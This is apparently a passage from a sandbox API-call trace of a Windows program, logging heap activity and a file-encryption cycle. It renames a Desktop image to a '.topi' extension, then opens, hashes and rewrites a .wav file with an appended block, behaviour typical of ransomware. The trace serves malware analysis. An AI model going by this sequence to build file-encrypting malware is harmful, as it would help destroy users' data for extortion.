(HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.575] GetCurrentThreadId () returned 0x8c4 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.575] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.576] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.576] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.577] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p9_9SN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p9_9sn.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p9_9SN.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p9_9sn.jpg.topi")) returned 1 [0094.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.577] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.577] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.578] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.578] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0cf8b90, ftCreationTime.dwHighDateTime=0x1d5c4a4, ftLastAccessTime.dwLowDateTime=0xb0019700, ftLastAccessTime.dwHighDateTime=0x1d5bcbe, ftLastWriteTime.dwLowDateTime=0xb0019700, ftLastWriteTime.dwHighDateTime=0x1d5bcbe, nFileSizeHigh=0x0, nFileSizeLow=0x7d7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pA5hO5i.wav", cAlternateFileName="")) returned 1 [0094.579] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pA5hO5i.wav") returned=".wav" [0094.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pA5hO5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pa5ho5i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.579] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=32127) returned 1 [0094.579] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.581] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7d59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.581] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.582] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.583] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.583] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.583] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.583] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.583] GetLastError () returned 0x0 [0094.583] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.583] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.583] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.584] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.584] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d80) returned 0x99f52d8 [0094.584] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.584] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3c40 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90a8 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3c88 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90c0 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.584] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.584] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9108 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d90f0 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0094.585] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.585] GetCurrentThreadId () returned 0x8c4 [0094.585] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1ca0 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.586] GetCurrentThreadId () returned 0x8c4 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.586] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.586] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9108 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90d8 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9120 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.587] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.587] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d90f0 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90f0 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x320fab0 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.588] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.588] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9120 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9108 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90d8 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d90c0 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3c88 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0094.589] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x7d7a, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x7d7a, lpOverlapped=0x0) returned 1 [0094.589] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.589] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7d7f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.590] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, 